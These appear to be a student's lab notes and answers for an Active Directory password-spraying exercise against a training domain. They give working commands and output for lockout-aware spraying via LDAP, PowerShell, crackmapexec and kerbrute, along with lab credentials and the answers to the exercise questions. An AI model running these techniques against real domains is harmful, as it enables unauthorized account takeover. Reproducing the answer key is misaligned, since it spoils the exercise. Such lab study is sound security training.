Topics: AD Password Attacks
Questions
Follow the steps outlined in this section and spray the password Nexus123! with the three different tools introduced in this section. What is the minimum password length required in the target domain?
# Answer
Minimum password length:                              7

Questions 2
Spray the credentials of pete against all domain joined machines with crackmapexec. On which machine is pete a local administrator?
# Answer
CLIENT76


# Access to the RDP and open powershell in administrator mode   
xfreerdp /cert-ignore /u:jeff /d:corp.com /p:HenchmanPutridBonbon11 /v:192.168.163.75

PS C:\Users\jeff> net accounts
Force user logoff how long after time expires?:       Never
Minimum password age (days):                          1
Maximum password age (days):                          42
Minimum password length:                              7
Length of password history maintained:                24
Lockout threshold:                                    5
Lockout duration (minutes):                           30
Lockout observation window (minutes):                 30

# Lockout threshold indicates a limit of fice login attempts before lockout. Which means we can safely attempt four logins before trigerring a lockout.
# Lockout observation window (minutes) every 30 minutes after the last failed login, we can make additional attempts
# So we could attempt 192 logins in a 24-hour period against every domain user without trigerring a lockout.

# In the Module Active Directory Introduction and Enumeration, we used the DirectoryEntry constructor without arguments, but we can provide three arguments, including the LDAP path to the domain controller, the username, and the password:

PS C:\Users\jeff> $domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
PS C:\Users\jeff> $PDC = ($domainObj.PdcRoleOwner).Name
PS C:\Users\jeff> $SearchString = "LDAP://"
PS C:\Users\jeff> $SearchString += $PDC + "/"
PS C:\Users\jeff> $DistinguishedName = "DC=$($domainObj.Name.Replace('.', ',DC='))"
PS C:\Users\jeff> $SearchString += $DistinguishedName
PS C:\Users\jeff> New-Object System.DirectoryServices.DirectoryEntry($SearchString, "pete", "Nexus123!")
... # Account show the password is correct
distinguishedName : {DC=corp,DC=com}
Path              : LDAP://DC1.corp.com/DC=corp,DC=com
...


# We could use the technique above to create a Powershell script that enumerates all users and platforms authentications according to the Lockout Threshold and Lockout observation windows
# Password spraying tactic is already implemented in the PowerShell script C:\Tools\Spray-Passwords.ps1 
PS C:\Tools> powershell -ep bypass
PS C:\Tools> .\Spray-Passwords.ps1 -Pass Nexus123! -Admin
...
Users guessed are:
 'pete' with password: 'Nexus123!'
 'jen' with password: 'Nexus123!'
...

# ! Second Methods ! 

# The second kind of password spraying attack against AD users leverages SMB. This is one of the traditional approaches of password attacks in AD and comes with some drawbacks
# We can use crackmapexec4 on Kali to perform this kind of password spraying. We'll select smb as protocol and enter the IP address of any domain joined system such as CLIENT75 (192.168.50.75). Then, we can provide a list or single users and passwords to -u and -p. In addition, we will enter the domain name for -d and provide the option --continue-on-success to avoid stopping at the first valid credential. For the purposes of this example, we'll create a text file named users.txt containing a subset of the domain usernames dave, jen, and pete to spray the password Nexus123! against.

nano users.txt
dave
jen
pete

sudo crackmapexec smb 192.168.163.75 -u users.txt -p 'Nexus123!' -d corp.com --continue-on-success
...
SMB         192.168.163.75  445    CLIENT75         [*] Windows 11 Build 22000 x64 (name:CLIENT75) (domain:corp.com) (signing:False) (SMBv1:False)
SMB         192.168.163.75  445    CLIENT75         [-] corp.com\dave:Nexus123! STATUS_LOGON_FAILURE 
SMB         192.168.163.75  445    CLIENT75         [+] corp.com\jen:Nexus123! 
SMB         192.168.163.75  445    CLIENT75         [+] corp.com\pete:Nexus123! 
...

# We should note that crackmapexec doesn't examine the password policy of the domain before starting the password spraying. As a result, we should be cautious about locking out user accounts with this method.

# As a bonus, however, the output of crackmapexec not only displays if credentials are valid, but also if the user with the identified credentials has administrative privileges on the target system. For example, dave is a local admin on CLIENT75. Let's use crackmapexec with the password Flowers1 targeting this machine.

sudo crackmapexec smb 192.168.163.75 -u dave -p 'Flowers1' -d corp.com
...
SMB         192.168.163.75  445    CLIENT75         [*] Windows 11 Build 22000 x64 (name:CLIENT75) (domain:corp.com) (signing:False) (SMBv1:False)
SMB         192.168.163.75  445    CLIENT75         [+] corp.com\dave:Flowers1 (Pwn3d!)
...

# Above crackmapexec added Pwn3d! to the output indicating that dave has administrative privileges on the target system

# ! Third Methods ! 

# The third kind of password spraying attack we'll discuss is based on obtaining a TGT. For example, using kinit5 on a Linux system, we can obtain and cache a Kerberos TGT. We'll need to provide a username and password to do this. If the credentials are valid, we'll obtain a TGT. The advantage of this technique is that it only uses two UDP frames to determine whether the password is valid, as it sends only an AS-REQ and examines the response.

# We could use Bash scripting or a programming language of our choice to automate this method. Fortunately, we can also use the tool kerbrute,6 implementing this technique to spray passwords. Since this tool is cross-platform, we can use it on Windows and Linux

# Let's use the Windows version in C:\Tools to perform this attack. To conduct password spraying, we need to specify the passwordspray command along with a list of usernames and the password to spray. We'll also need to enter the domain corp.com as an argument for -d. As previously, we'll create a file named usernames.txt in C:\Tools containing the usernames pete, dave, and jen.

PS C:\Tools> type .\usernames.txt
pete
dave
jen
PS C:\Tools> .\kerbrute_windows_amd64.exe passwordspray -d corp.com .\usernames.txt "Nexus123!"
...
2024/05/19 03:08:21 >  [+] VALID LOGIN:  jen@corp.com:Nexus123!
2024/05/19 03:08:21 >  [+] VALID LOGIN:  pete@corp.com:Nexus123!
...

# Questions 2
sudo crackmapexec smb 192.168.163.76 -u pete -p 'Nexus123!' -d corp.com
SMB         192.168.163.76  445    CLIENT76         [*] Windows 10 / Server 2016 Build 16299 x64 (name:CLIENT76) (domain:corp.com) (signing:False) (SMBv1:False)
SMB         192.168.163.76  445    CLIENT76         [+] corp.com\pete:Nexus123! (Pwn3d!)
